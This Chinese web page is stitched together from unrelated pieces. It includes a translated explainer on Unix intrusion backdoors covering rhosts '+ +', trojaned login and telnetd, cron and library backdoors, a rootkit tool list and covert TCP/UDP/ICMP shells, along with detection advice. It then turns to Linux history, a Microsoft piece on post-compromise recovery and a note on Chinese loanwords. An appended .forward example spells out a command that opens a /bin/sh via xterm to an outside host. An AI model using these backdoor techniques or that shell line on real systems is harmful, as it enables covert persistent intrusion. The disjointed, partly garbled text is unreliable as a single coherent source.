本文目录一览:
所谓的后门入侵是什么?
什么是后门?
从早期的计算机入侵者开始,他们就努力发展能使自己重返被入侵系统的技术或后门.本文将讨论许多常见的后门及其检测方法. 更多的焦点放在Unix系统的后门,同时讨论一些未来将会出现的Windows NT的后门. 本文将描述如何测定入侵者使用的方法这样的复杂内容和管理员如何防止入侵者重返的基础知识. 当管理员懂的一旦入侵者入侵后要制止他们是何等之难以后, 将更主动于预防第一次入侵. 本文试图涉及大量流行的初级和高级入侵者制作后门的手法, 但不会也不可能覆盖到所有可能的方法.
大多数入侵者的后门实现以下二到三个目的:
即使管理员通过改变所有密码类似的方法来提高安全性,仍然能再次侵入. 使再次侵入被发现的可能性减至最低.大多数后门设法躲过日志, 大多数情况下即使入侵者正在使用系统也无法显示他已在线. 一些情况下, 如果入侵者认为管理员可能会检测到已经安装的后门, 他们以系统的 脆弱性作为唯一的后门, 重而反复攻破机器. 这也不会引起管理员的注意. 所以在 这样的情况下,一台机器的脆弱性是它唯一未被注意的后门.
密码破解后门
这是入侵者使用的最早也是最老的方法, 它不仅可以获得对Unix机器的访问, 而且可以通过破解密码制造后门. 这就是破解口令薄弱的帐号. 以后即使管理员封了入侵者的当前帐号,这些新的帐号仍然可能是重新侵入的后门. 多数情况下, 入侵者寻找口令薄弱的未使用帐号,然后将口令改的难些. 当管理员寻找口令薄弱的帐号是, 也不会发现这些密码已修改的帐号.因而管理员很难确定查封哪个帐号.
Rhosts + + 后门
在连网的Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简单的认证方法. 用户可以轻易的改变设置而不需口令就能进入. 入侵者只要向可以访问的某用户的rhosts文件中输入"+ +", 就可以允许任何人从任何地方无须口令便能进入这个帐号. 特别当home目录通过NFS向外共享时, 入侵者更热中于此. 这些帐号也成了入侵者再次侵入的后门. 许多人更喜欢使用Rsh, 因为它通常缺少日志能力. 许多管
理员经常检查 "+ +", 所以入侵者实际上多设置来自网上的另一个帐号的主机名和用户名,从而不易被发现.
校验和及时间戳后门
早期,许多入侵者用自己的trojan程序替代二进制文件. 系统管理员便依*时间戳和系统校验和的程序辨别一个二进制文件是否已被改变, 如Unix里的sum程序. 入侵者又发展了使trojan文件和原文件时间戳同步的新技术. 它是这样实现的: 先将系统时钟拨回到原文件时间, 然后调整trojan文件的时间为系统时间. 一旦二进制trojan文件与原来的精确同步, 就可以把系统时间设回当前时间. sum程序是基于CRC校验, 很容易
骗过.入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序. MD5是被大多数人推荐的,MD5使用的算法目前还没人能骗过.
Login后门
在Unix里,login程序通常用来对telnet来的用户进行口令验证. 入侵者获取login.c的原代码并修改,使它在比较输入口令与存储口令时先检查后门口令. 如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入. 这将允许入侵者进入任何帐号,甚至是root.由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问的, 所以入侵者可以登录获取shell却不会暴露该帐号. 管理员注意到这种后门后, 便
用"strings"命令搜索login程序以寻找文本信息. 许多情况下后门口令会原形毕露.入侵者就开始加密或者更好的隐藏口令, 使strings命令失效. 所以更多的管理员是用MD5校验和检测这种后门的.
Telnetd后门
当用户telnet到系统, 监听端口的inetd服务接受连接随后递给in.telnetd,由它运行login.一些入侵者知道管理员会检查login是否被修改, 就着手修改in.telnetd.在in.telnetd内部有一些对用户信息的检验, 比如用户使用了何种终端. 典型的终端设置是Xterm或者VT100.入侵者可以做这样的后门, 当终端设置为"letmein"时产生一个不要任何验证的shell. 入侵者已对某些服务作了后门, 对来自特定源端口的连接产
生一个shell .
服务后门
几乎所有网络服务曾被入侵者作过后门. finger, rsh, rexec, rlogin, ftp, 甚至inetd等等的作了的版本随处多是. 有的只是连接到某个TCP端口的shell,通过后门口令就能获取访问.这些程序有时用刺娲□?ucp这样不用的服务,或者被加入inetd.conf作为一个新的服务.管理员应该非常注意那些服务正在运行, 并用MD5对原服务程序做校验.
Cronjob后门
Unix上的Cronjob可以按时间表调度特定程序的运行. 入侵者可以加入后门shell程序使它在1AM到2AM之间运行,那么每晚有一个小时可以获得访问. 也可以查看cronjob中经常运行的合法程序,同时置入后门.
库后门
几乎所有的UNIX系统使用共享库. 共享库用于相同函数的重用而减少代码长度. 一些入侵者在象crypt.c和_crypt.c这些函数里作了后门. 象login.c这样的程序调用了crypt(),当使用后门口令时产生一个shell. 因此, 即使管理员用MD5检查login程序,仍然能产生一个后门函数.而且许多管理员并不会检查库是否被做了后门.对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验. 有一种办法是入侵者对open()和文件访问函数做后门. 后门函数读原文件但执行trojan后门程序. 所以 当MD5读这些文件时,校验和一切正常. 但当系统运行时将执行trojan版本的. 即使trojan库本身也可躲过MD5校验. 对于管理员来说有一种方法可以找到后门, 就是静态编连MD5校验程序然后运行.静态连接程序不会使用trojan共享库.
内核后门
内核是Unix工作的核心. 用于库躲过MD5校验的方法同样适用于内核级别,甚至连静态连接多不能识别. 一个后门作的很好的内核是最难被管理员查找的, 所幸的是内核的后门程序还不是随手可得, 每人知道它事实上传播有多广.
文件系统后门
入侵者需要在服务器上存储他们的掠夺品或数据,并不能被管理员发现. 入侵者的文章常是包括exploit脚本工具,后门集,sniffer日志,email的备分,原代码,等等. 有时为了防止管理员发现这么大的文件, 入侵者需要修补"ls","du","fsck"以隐匿特定的目录和文件.在很低的级别, 入侵者做这样的漏洞: 以专有的格式在硬盘上割出一部分,且表示为坏的扇区. 因此入侵者只能用特别的工具访问这些隐藏的文件. 对于普通的
管理员来说, 很难发现这些"坏扇区"里的文件系统, 而它又确实存在.
Boot块后门
在PC世界里,许多病毒藏匿与根区, 而杀病毒软件就是检查根区是否被改变. Unix下,多数管理员没有检查根区的软件, 所以一些入侵者将一些后门留在根区.
隐匿进程后门
入侵者通常想隐匿他们运行的程序. 这样的程序一般是口令破解程序和监听程序 (sniffer).有许多办法可以实现,这里是较通用的: 编写程序时修改自己的argv[]使它看起来象其他进程名. 可以将sniffer程序改名类似in.syslog再执行. 因此当管理员用"ps"检查运行进程时, 出现 的是标准服务名. 可以修改库函数致使
"ps"不能显示所有进程. 可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现. 使用这个技术的一个后门例子是amod.tar.gz :
也可以修改内核隐匿进程.
Rootkit
最流行的后门安装包之一是rootkit. 它很容易用web搜索器找到.从Rootkit的README里,可以找到一些典型的文件:
z2 - removes entries from utmp, wtmp, and lastlog.
Es - rokstar's ethernet sniffer for sun4 based kernels.
Fix - try to fake checksums, install with same dates/perms/u/g.
Sl - become root via a magic password sent to login.
Ic - modified ifconfig to remove PROMISC flag from output.
ps: - hides the processes.
Ns - modified netstat to hide connections to certain machines.
Ls - hides certain directories and files from being listed.
du5 - hides how much space is being used on your hard drive.
ls5 - hides certain files and directories from being listed.
网络通行后门
入侵者不仅想隐匿在系统里的痕迹, 而且也要隐匿他们的网络通行. 这些网络通行后门有时允许入侵者通过防火墙进行访问. 有许多网络后门程序允许入侵者建立某个端口号并不用通过普通服务就能实现访问. 因为这是通过非标准网络端口的通行, 管理员可能忽视入侵者的足迹. 这种后门通常使用TCP,UDP和ICMP, 但也可能是其他类型报文.
TCP Shell 后门
入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下,他们用口令进行保护以免管理员连接上后立即看到是shell访问. 管理员可以用netstat命令查看当前的连接状态, 那些端口在侦听, 目前连接的来龙去脉. 通常这些后门可以让入侵者躲过TCP Wrapper技术. 这些后门可以放在SMTP端口, 许多防火墙允许e-mail通行的.
UDP Shell 后门
管理员经常注意TCP连接并观察其怪异情况, 而UDP Shell后门没有这样的连接, 所以netstat不能显示入侵者的访问痕迹. 许多防火墙设置成允许类似DNS的UDP报文的通行. 通常入侵者将UDP Shell放置在这个端口, 允许穿越防火墙.
ICMP Shell 后门
Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一. 许多防火墙允许外界ping它内部的机器. 入侵者可以放数据入Ping的ICMP包, 在ping的机器间形成一个shell通道. 管理员也许会注意到Ping包暴风, 但除了他查看包内数据, 否者入侵者不会暴露.
加密连接
管理员可能建立一个sniffer试图某个访问的数据, 但当入侵者给网络通行后门加密后,就不可能被判定两台机器间的传输内容了.
Windows NT
由于Windows NT不能轻易的允许多个用户象Unix下访问一台机器, 对入侵者来说就很难闯入Windows NT,安装后门,并从那里发起攻击. 因此你将更频繁地看到广泛的来自Unix的网络攻击. 当Windows NT提高多用户技术后, 入侵者将更频繁地利用 WindowsNT.如果这一天真的到来, 许多Unix的后门技术将移植到Windows NT上, 管理员可以等候入侵者的到来. 今天, Windows NT已经有了telnet守护程序. 通过网络通行后门, 入侵者发现在Windows NT安装它们是可行的. ( With Network Traffic
backdoors, theyarevery feasible for intruders to install on Windows NT. 此处该如何翻译? :(
解决
当后门技术越先进, 管理员越难于判断入侵者是否侵入后者他们是否被成功封杀.
评估
首先要做的是积极准确的估计你的网络的脆弱性, 从而判定漏洞的存在且修复之.许多商业工具用来帮助扫描和查核网络及系统的漏洞. 如果仅仅安装提供商的安全补丁的话,许多公司将大大提高安全性.
MD5基准线
一个系统(安全)扫描的一个重要因素是MD5校验和基准线. MD5基准线是在黑客入侵前由干净系统建立. 一旦黑客入侵并建立了后门再建立基准线, 那么后门也被合并进去了.一些公司被入侵且系统被安置后门长达几个月.所有的系统备份多包含了后门. 当公司发现有黑客并求助备份祛除后门时, 一切努力是徒劳的, 因为他们恢复系统的同时也恢复了后门. 应该在入侵发生前作好基准线的建立.
入侵检测
随着各种组织的上网和允许对自己某些机器的连接,入侵检测正变的越来越重要.以前多数入侵检测技术是基于日志型的. 最新的入侵检测系统技术(IDS)是基于实时侦听和网络通行安全分析的. 最新的IDS技术可以浏览DNS的UDP报文, 并判断是否符合DNS协议请求. 如果数据不符合协议, 就发出警告信号并抓取数据进行进一步分析. 同样的原则可以运用到ICMP包, 检查数据是否符合协议要求, 或者是否装载加密shell会话.
从CD-ROM启动
一些管理员考虑从CD-ROM启动从而消除了入侵者在CD-ROM上做后门的可能性.这种方法的问题是实现的费用和时间够企业面临的.
警告
由于安全领域变化之快, 每天有新的漏洞被公布, 而入侵者正不断设计新的攻击和安置后门技术, 安枕无忧的安全技术是没有的.请记住没有简单的防御,只有不懈的努力!
( Be aware that no defense is foolproof, and that there is no substitute for
diligent attention. 此句该如何翻译? :( )
-------------------------------------------------------------------------
you may want to add:
.forward Backdoor
On Unix machines, placing commands into the .forward file was also
a common method of regaining access. For the account ``username''
a .forward file might be constructed as follows:
\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e
/bin/sh"
permutations of this method include alteration of the systems mail
aliases file (most commonly located at /etc/aliases). Note that
this is a simple permutation, the more advanced can run a simple
script from the forward file that can take arbitrary commands via
stdin (after minor preprocessing).
PS: The above method is also useful gaining access a companies
mailhub (assuming there is a shared a home directory FS on
nbs
the client and server).
Using smrsh can effectively negate this backdoor (although it's quite
possibly still a problem if you allow things like elm's filter or
procmail which can run programs themselves...).
你也许要增加:
.forward后门
Unix下在.forward文件里放入命令是重新获得访问的常用方法. 帐户'username'的.forward可能设置如下:
\username
|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 -e/bin/sh"
这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后).利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elm's filter或 procmail类程序, 很有可能还有问题 ......)
参考资料:zhidao.baidu.com
什么是linux?其创始人是谁
Linux内核最初只是由芬兰人李纳斯·托瓦兹(Linus Torvalds)在赫尔辛基大学上学时出于个人爱好而编写的,当时他并不满意Minix这个教学用的操作系统。最初的设想中,Linux 是一种类似Minix这样的一种操作系统。Linux的第一个版本在1991年9月被大学FTP server管理员Ari Lemmke发布在Internet上,最初Torvalds
称这个核心的名称为 "Freax" ,意思是自由( "free") 和奇异( "freak") 的结合字,并且附上了"X"这个常用的字母,以配合所谓的 Unix-like 的系统。但是FTP server管理员嫌原来的命名“Freax”的名称不好听,把核心的称呼改成“Linux”,当时仅有10000行代码,仍必须执行于Minix操作系统之上,并且必须使用硬盘开机;随后在10月份第二个版本(0.02版)就发布了,同时这位芬兰赫尔辛基的大学生在comp.os.minix上发布一则信息:Hello everybody out there using minix-
I'm doing a (free) operation system (just a hobby,
won't be big and professional like gnu) for 386(486) AT clones.
二、历史
Linux 的历史是和GNU紧密联系在一起的。从1983年开始的GNU计划致力于开发一个自由并且完整的类Unix操作系统,包括软件开发工具和各种应用程序。到1991年 Linux 内核发布的时候,GNU已经几乎完成了除了系统内核之外的各种必备软件的开发。在Linus Torvalds和其他开发人员的努力下,GNU组件可以运行于Linux内核之上。整个内核是基于 GNU 通用公共许可,也就是GPL(GNU General Public License,GNU通用公共许可证)的,但是Linux内核并不是GNU 计划的一部分。1994年3月,Linux1.0版正式发布,Marc Ewing成立了 Red Hat 软件公司,成为最著名的 Linux 分销商之一。
Unix Linux历史源流早期Linux的开机管理程序(boot loader)是使用LILO(Linux Loader),存在着一些难以容忍的缺陷,例如无法识别8G以外的硬盘,后来新增GRUB(GRand Unified Bootloader)克服了这些缺点,具有‘动态搜寻核心档案’的功能,可以让您在开机的时候,可以自行编辑您的开机设定系统档案,透过 ext2 或 ext3 档案系统中载入 Linux Kernel。
Linux 的标志和吉祥物是一只名字叫做 Tux 的 企鹅,标志的由来是因为Linus在澳洲时曾被一只动物园里的企鹅咬了一口,便选择了企鹅作为Linux的标志。Linux的注册商标是Linus Torvalds所有的。这是由于在1996年,一个名字叫做William R. Della Croce的律师开始向各个 Linux 发布商发信,声明他拥有Linux商标的所有权,并且要求各个发布商支付版税,这些发行商集体进行上诉,要求将该注册商标重新分配给 Linus Torvalds。Linus Torvalds 一再声明 Linux 是免费的,他本人可以卖掉,但 Linux 绝不能卖。
Linux发行版的某些版本是不需要安装,只需通过CD或者可启动的USB存储设备就能使用的版本,他们称为 LiveCD。
三、用户群
GNU/Linux爱好者设计的宣传图,并使用GPL授权
GNU/Linux社群设计的立体图,并使用GPL授权传统的Linux用户一般都安装并设置自己的操作系统,他们往往比其他操作系统,例如微软Windows和Mac OS的用户更有经验。这些用户有时被称作“黑客”或是“极客”(geek)。然而随着Linux越来越流行,越来越多的原厂委托制造(OEM)开始在其销售的电脑上预装上Linux,Linux的用户中也有了普通电脑用户,Linux系统也开始慢慢抢占桌面电脑操作系统市场。同时Linux也是最受欢迎的服务器操作系统之一。Linux也在嵌入式电脑市场上拥有优势,低成本的特性使Linux深受用户欢迎。使用Linux主要的成本为移植、培训和学习的费用,早期由于会使用Linux的人较少,这方面费用较高,但这方面的费用已经随着Linux的日益普及和Linux上的软件越来越多、越来越方便而降低。
KDE和GNOME等桌面系统使Linux更像是一个Mac或Windows之类的操作系统,提供完善的图形用户界面,而不同于其他使用命令行界面(Command Line Interface,CLI)的类Unix操作系统。
四、未来软件界的方向
Linux 作为较早的源代码开放操作系统,将引领未来软件发展的方向。
基于 Linux 开放源码的特性,越来越多大中型企业及政府投入更多的资源来开发 Linux。现今世界上,很多国家逐渐的把政府机构内部门的电脑转移到 Linux 上,这个情况还会一直持续。Linux 的广泛使用为政府机构节省了不少经费,也降低了对封闭源码软件潜在的安全性的忧虑。
五、Linux的英文发音
根据Torvalds的说法,Linux的发音和“Minix”是押韵的。
“Li”中“i”的发音类似于“Minix”中“i”的发音,而“nux”中“u”的发音类似于英文单词“profess”中“o”的发音。依照国际音标应该是['linэks]——类似于“喱呐科斯”
有一份Torvalds本人说话的音频,音频内容为“Hello, this is Linus Torvalds, and I pronounce Linux as Linux”。
六、应用
运行在SUSE上的KDE桌面环境。过去,Linux主要被用作服务器的操作系统,但因它的廉价、灵活性及Unix背景使得它很合适作更广泛的应用。传统上,以Linux为基础的“LAMP(Linux, Apache, MySQL, Perl/PHP/Python的组合)”技术,除了已在开发者群体中广泛流行,它亦是现时提供网站务供应商最常使用的平台。
基于其低廉成本与高度可设定性,Linux常常被应用于嵌入式系统,例如机顶盒、移动电话及行动装置等。在移动电话上,Linux已经成为Symbian OS的主要竞争者;而在行动装置上,则成为Windows CE与Palm OS外之另一个选择。目前流行的TiVo数位摄影机使用了经过客制化后的Linux。此外,有不少硬件式的网络防火墙及路由器,例如部份LinkSys的产品,其内部都是使用Linux来驱动、并采用了操作系统提供的防火墙及路由功能。
采用Linux的超级电脑亦愈来愈多,根据2005年11月号的TOP500超级电脑列表,现时世上最快速的两组超级电脑都是使用Linux作为其操作系统。而在表列的500套系统里,采用Linux为操作系统的,占了371组(即74.2%),其中的前十位者,有7组是使用Linux的。
2006年开始发售的SONY PlayStation 3亦使用Linux的操作系统。之前,Sony亦曾为他们的PlayStation 2推出过一套名为PS2 Linux的DIY组件。至于游戏开发商雅达利及id Software,都有为其旗下的游戏推出过Linux桌面版本。此外,Linux Game Publishing亦有专门为Linux平台撰写游戏,并致力于把其他在Windows平台编撰的游戏程序码转携至Linux平台,及为转携游戏提供使用授权。
而一个打算对所有生活在发展中国家孩子提供手提电脑的名为每孩子皆有一部手提电脑(OLPC)的项目,正是使用Linux作为缺省的操作系统。
七、发行版
Linux 主要作为Linux 发行版(通常被称为"distro")的一部分而使用。这些发行版由个人,松散组织的团队,以及商业机构和志愿者组织编写。它们通常包括了其他的系统软件和应用软件,以及一个用来简化系统初始安装的安装工具,和让软件安装升级的集成管理器。发行版为许多不同的目的而制作, 包括对不同计算机结构的支持, 对一个具体区域或语言的本地化,实时应用,和嵌入式系统,甚至许多版本故意地只加入免费软件。目前,超过三百个发行版被积极的开发,最普遍被使用的发行版有大约十二个.
一个典型的Linux发行版包括:Linux内核,一些GNU程序库和工具,命令行shell,图形界面的X Window系统和相应的桌面环境,如KDE或GNOME,并包含数千种从办公套件,编译器,文本编辑器到科学工具的应用软件。
目前最著名的发行版有Debian,红帽(redhat),ubuntu,suse,CentOS,fedora等
八、Linux与其他操作系统区别
Linux可以与MS-DOS、OS/2、Windows等其他操作系统共存于同一台机器上。它们均为操作系统,具有一些共性,但是互相之间各有特色,有所区别。
目前运行在PC机上的操作系统主要有Microsoft的MS-DOS、Windows、Windows NT、IBM的OS/2等。早期的PC机用户普遍使用MS-DOS,因为这种操作系统对机器的硬件配置要求不高,而随着计算机硬件技术的飞速发展,硬件设备价格越来越低,人们可以相对容易地提高计算机的硬件配置,于是开始使用Windows、Windows NT等具有图形界面的操作系统。Linux是新近被人们所关注的操作系统,它正在逐渐为PC机的用户所接受。那么,Linux与其他操作系统的主要区别是什么呢?下面从两个方面加以论述。
Linux与MS-DOS之间的区别
在同一系统上运行Linux和MS-DOS已很普遍,就发挥处理器功能来说,MS-DOS没有完全实现x86处理器的功能,而Linux完全在处理器保护模式下运行,并且开发了处理器的所有特性。Linux可以直接访问计算机内的所有可用内存,提供完整的Unix接口。而MS-DOS只支持部分Unix的接口。
要是被黑客攻击了怎么办啊?
信息安全不仅仅需要防范病毒
如果您看过第一篇文章(),您大概已经知道我的观点:系统是永远不可能完全安全的—至少是,如果您要实际使用系统,它就不可能完全安全。另外一个我赞同的论点是(;query=lemmact=),除了蠕虫和病毒外,还有许多其他问题在威胁着信息安全性(虽然蠕虫和病毒是有区别的,但是这方面的专家仍在就它们之间存在什么区别而争论不休;在本文中,我们主要讨论一般的恶意代码,因此在文中将蠕虫和病毒作为同一种攻击类型对待,并将它们统称为“蠕虫”)。既然我们将始终关注蠕虫问题,为什么不能将它们统称为蠕虫呢?Sasser/Blaster/Lion/Trino/Ramen/Slapper 和其他蠕虫都有极强的破坏性,消除这些蠕虫需要巨大的花费。虽然有几个蠕虫属于例外(例如 Linux Ramen 蠕虫和 Code Red),但一般来说蠕虫本身是没有破坏性的。这不是说蠕虫不可能有破坏性,而是说在您处理蠕虫时,您基本上知道会有什么结果。许多人都感染了相同的蠕虫,至少一部分人能够消除蠕虫,这就免除了您的麻烦。
但是,其中一些蠕虫会在系统中开设后门—这些后门使得真正的恶意攻击者能对系统进行比蠕虫本身的行为恶劣得多的破坏。Nimda 就是这样的蠕虫。另一种 Linux 蠕虫 Slapper 也是如此。蠕虫在您的系统中开设后门之后,恶意攻击者即可通过 Internet 控制您的系统。此外,所有这些蠕虫都不会创建任何种类的日志文件,因此您无法得知别人通过后门进行了哪些操作。系统被其中一种蠕虫感染之后,您就不能再信任该系统上的任何东西。事实上,一旦蠕虫成功地侵入了系统,您就应该将此视为不能再信任系统的征兆。另一种攻击很可能与蠕虫采用了相同的手段(攻击方式),并且可能已经对系统造成了比蠕虫本身更恶劣的影响。关键是,我们不应该把太多的注意力放在蠕虫上,而是应该更加关注蠕虫利用的漏洞。
电子邮件蠕虫问题与此略有不同;它们基本上是第 8 层问题—它们利用的是用户,而不是技术漏洞。这意味着我们必须用不同的方法来处理电子邮件蠕虫—用户只要不双击电子邮件附件,就不会有这些问题。反过来,如果管理措施能够让用户禁止接收任何电子邮件附件,至少对那些不愿意学会不双击可疑附件的用户来说,就也不会出现这类问题了。在比较新的 Microsoft Exchange 和 Outlook 版本上,做到这点非常容易。当然,这些用户中的任何人也可能会双击恶意的特洛依木马,那可是自讨苦吃的问题了。如果系统感染了电子邮件蠕虫,只凭这个事实还不能充分证明该系统已经被一位主动攻击者像网络蠕虫(例如 Sasser)侵入系统时那样破坏了系统的安全性。
到一天快过去的时候,比起蠕虫来,我更加担心主动攻击者—主动攻击者可使用许多不同的手段来进入您的系统和网络。蠕虫问题可以采取一些相对简单的步骤来解决(现列举如下,但不一定要实施):
• 确保在所有的相关修补程序发布之后都立即进行部署。
• 使用防火墙。
• 使用防病毒程序。如果您没有防病毒程序,请到 免费下载一个。有关如何在更大的环境中部署防病毒解决方案的详细信息,请参阅新的 Microsoft Antivirus Defense-in-Depth Guide(Microsoft 防病毒纵深防御指南),地址是 。
• 教育用户在检查邮件是否合法之前不要双击其中未经请求的附件;或者,禁止用户双击附件。
阻止蓄意的主动攻击者进入系统并不总是这么简单。此外,有些读者指出,我们并不总是有足够的备份来可靠地恢复系统。因此,检测系统是否已遭受危害就变得非常重要;如果答案是肯定的,则要判断系统受到了什么样的危害。这里有几种检测和判断方法。
返回页首
在没有备份的情况下抢救数据
使我夜不能寐的事情之一(除了小孩子的吵闹声或我乘坐的飞机的引擎噪音外)不是坏人有可能正站在我的门口,而是坏人已经登堂入室而我却不知道。我们都知道世界上坏人不少。在 Microsoft 最近举行的 Tech-Ed 会议上,一些犯罪组织“悬赏”50,000 美元奖励那些能够在会议期间摧毁网络的人。我们怎么知道这些人是不是位于系统内部?如果他们不够高明,他们会留下痕迹,比如新帐户、奇怪的文件和潜在的不稳定系统。目前,大多数攻击者都应该属于这一种;至少我希望他们是。但也有一些攻击者非常高明。他们在攻入系统之后会在操作系统中消失。他们会在根目录下安装一个组件,使得系统不再值得信任。Windows 资源管理器和命令行将不再显示系统中实际存在的文件。注册表编辑器也不反映真实情况。帐户管理器工具并不显示所有用户。在入侵的这个阶段,您不能再信任系统对其自身状况的报告了。此时,您需要采取恢复和重建方案(有些人把它叫做“推倒重建”)。系统现在已被完全损害。您能检测到攻击已经发生了吗?能检测到攻击者进行了哪些操作吗?
检测此类入侵有几个窍门。其中一个窍门是使用基于网络的入侵检测系统 (IDS),它能跟踪进出您的网络的通信量。基于网络的 IDS 是中立的,如果它未被损害,它可以让您了解进出可疑系统的通信。全面讨论 IDS 系统超出了本文的范围;对我们中的大多数人来说,IDS 系统也超出了我们的直接需要。在许多情况下,实际上保证网络安全要比花时间实施 IDS 更有价值。我们的大多数网络都可能需要进行大量额外的安全工作,如果我们事先没能做到这一点,则肯定会得到许多有趣的 IDS 日志。
您也可以通过分析系统本身来检测到系统已被入侵,但是这涉及到一些深入的法庭辩论。例如,因为您不能信任系统本身,所以必须用中立介质引导系统,最好是只读的介质。选择之一是引导到 Windows PE,它是一个只有命令行的 CD 启动版本的 Windows XP 或 Windows Server 2003。但是通常很难获得 Windows PE。另一个选择是获得一个 Winternals ERD Commander 或 System Restore 副本 ()。这两个工具都基于 WinPE。ERD Commander 本质上是 WinPE 之上的一个 GUI,它为您提供了许多恢复崩溃系统的好工具。因为它是一个中立的安装,您可以信任该磁盘上的命令,由它告诉您可疑计算机上实际发生了什么情况。System Restore 是 ERD Commander 的扩展集,它也有对照基准检查系统的能力。例如,比如说您构建了一个 Web 服务器。一旦构建完成,您也就为系统状况创建了一个基准。将系统投入使用一段时间之后,您怀疑系统被黑了。例如,您可能检测到系统中发出了奇怪的网络通信量,于是决定对此展开分析。您可以让系统脱机,用恢复磁盘引导系统,然后比对最新的快照进行比较。这可以反映出已经发生的实际变化。但是,我们不能确定这些变化实际上是否代表入侵。您必须打电话请求技术帮助。
关于法庭辩论,最后要提醒的是:如果您真的相信已经受到入侵并想提起法律诉讼,您不应该自己独立进行辩论。请将系统断开,防止受损失范围扩大,然后邀请一位辩论专家。您有可能会毁灭证据并导致不被法庭采纳,这个风险会很大。如果您需要保留证据,请让专业人员来收集证据。
返回页首
在受到攻击之后恢复系统 – 有哪些有用的工具?
最后也是最重要的一个步骤:如果系统已经被黑了,怎样才能恢复服务并重新运行?这取决于系统的类型。首先,我不认为客户端备份有什么作用。网络中的客户端应该将它们的数据保存在服务器上;然后对服务器进行备份。如果客户端受到损害,可以重建客户端。服务器备份非常复杂。如果备份计划中包括客户端,则会使情况更为复杂,所以我们无须这样做。
但是很显然,在家庭环境或者非常小的网络中,这种观点是不适用的。在这样的环境中,我只使用少数几个内置的工具来生成最少数量的数据备份(不包括程序)。Windows XP 和 Windows 2000 自带了一个很好的备份工具。您可以用它将系统备份到任何媒介。在我看来,更简单的一个选择是使用“文件和设置转移向导”。每隔几个星期,我都会运行 Windows XP 中的“文件和设置转移向导”,为我的所有数据和配置文件创建备份副本。然后将这些备份烧制到 CD 上或者复制到另一个硬盘上。万一系统出现故障,只需几个小时即可重建系统,重新安装所有修补程序,然后用“文件和设置转移向导”恢复数据和配置文件。作为一种补充的安全措施,我还会用漫游配置文件来配置我家里的系统。该配置文件只漫游到同系统中的另一个硬盘,但是这种做法至少在发生硬盘故障的时候能够提供保护。但是,如果您感染的只是一般的病毒,用备份来恢复系统会有点小题大作。如果您只想清除病毒,请参见 Microsoft Antivirus Defense-in-Depth Guide(Microsoft 防病毒纵深防御指南)(),了解具体操作步骤。
在规模更大的网络上,我们需要服务器备份。完整的备份计划和过程超出了本文的讨论范围。但是,许多读者在对上一篇文章的评论中提到,不论我们怎么计划备份,我们仍经常没有足够的备份,因此不得不设法从被损害的系统中恢复数据。这有几个窍门。首先,找出最后一次值得信任的备份,并将该备份中的数据恢复到一个隔离的替代系统中。然后将数据从被损害的系统中复制到隔离的替代系统中。接下来,使用 Windiff 这样的差别比对工具运行备份差别比对,比较它与被损害的系统在数据上有什么不同。记住,必须先用前面介绍过的方法用中立介质引导被损害的系统,然后才能进行这个比较;否则备份也有可能被损害。对于已经被变更的每一项,请查明数据所有者。接下来的任务就是让数据所有者证明这种差异是否正常。如果他们接受了这些差异,则将数据逆向集成到受信任的备份中。这是一个复杂而费时的过程,但只有这样才能保证新系统获得所需的数据,而不是简单地将受到损害的信息恢复到新系统。如果您只是从被损害的备份中恢复数据,那么最好的情况也只是获得不可信任的数据。在最坏的情况下,您只能创建另一个被损害的系统。
返回页首
结论
我在上面简要介绍的过程的确是一个痛苦的过程。这一点毫无疑问。我唯一能说的是“别激活即时信使程序。”这正是我们花费大量精力查明如何预防系统被黑的原因。让服务恢复正常的过程是痛苦的。相比较而言,从长期效果看,防止被黑的痛苦要少得多,而且这使您不得不恢复系统的可能性要小得多。在以后的专栏里,我们将重新更多地提供指导说明,帮助您尽量减少对恢复的依赖。
我们一如既往地为您撰写这个专栏。如果您想讨论某个内容,或者您认为有什么方式能让我们更好地帮助您保护系统安全,请告诉我们。您只需单击下面的“评论”链接,并给我们发来您的评论。
汉语中的外来语
1、音译:
用发音相近的汉字将外来语翻译过来,这种不再有其自身的原意,只保留其语音和书写形式,如:“沙发(sofa)”、“迪斯科(disco)”、“克隆(clone)”、“托福(TOEFL)”、“黑客(hacker)”等。
2、半音半意:
主要用于复合外来词,可以分为两类。一是前半部分采用音译,后半部分采用意译,如:“呼啦圈(hula-hoop)”、“因特网(internet)”、“道林纸(Dowling paper)”等。
另外一种是前半部分采用意译,后半部分采用音译,如:“文化休克(culture shock)”、“奶昔(milk shake)”等。
3、音译附加汉语语素:
以单音节、双音节译词加汉语语素的借词使用最多:一类为音译语素加汉语语素,如:“高尔夫球(golf+球)”、“桑拿浴(sauna+浴)”、“保龄球(bowling+球)”、“拉力赛(rally+赛)”等。
另一类为汉语语素加音译语素,如:“打的(打+taxi)”、“中巴(中+bus)”、“酒吧(酒+ bar)”等。其中音译语素有的代表一个英语单词,有的代表部分语素。汉语语素有的是词根语素,有的是词缀语素。
4、音意兼顾:
即选用接近外来词词义的汉字进行转写。汉语同音字多,为译名用字的筛选提供了方便。或者是部分或者是全部音意兼顾。如:“香波(shampoo)”、“味美思(vercuth)”、“销品茂(shopping mall)”等。
5、仿译:
用本族语言的材料逐一翻译原词的语素,即按照外来词的形态结构和构词原理直译过来。例如:“超人(superman)”、“超市(supermarket)”、“千年虫(millennium bug)”、“热线(hot line)”、“冷战(cold war)”、“绿卡(green card)”等。
电脑黑客攻击电脑CPU怎么办
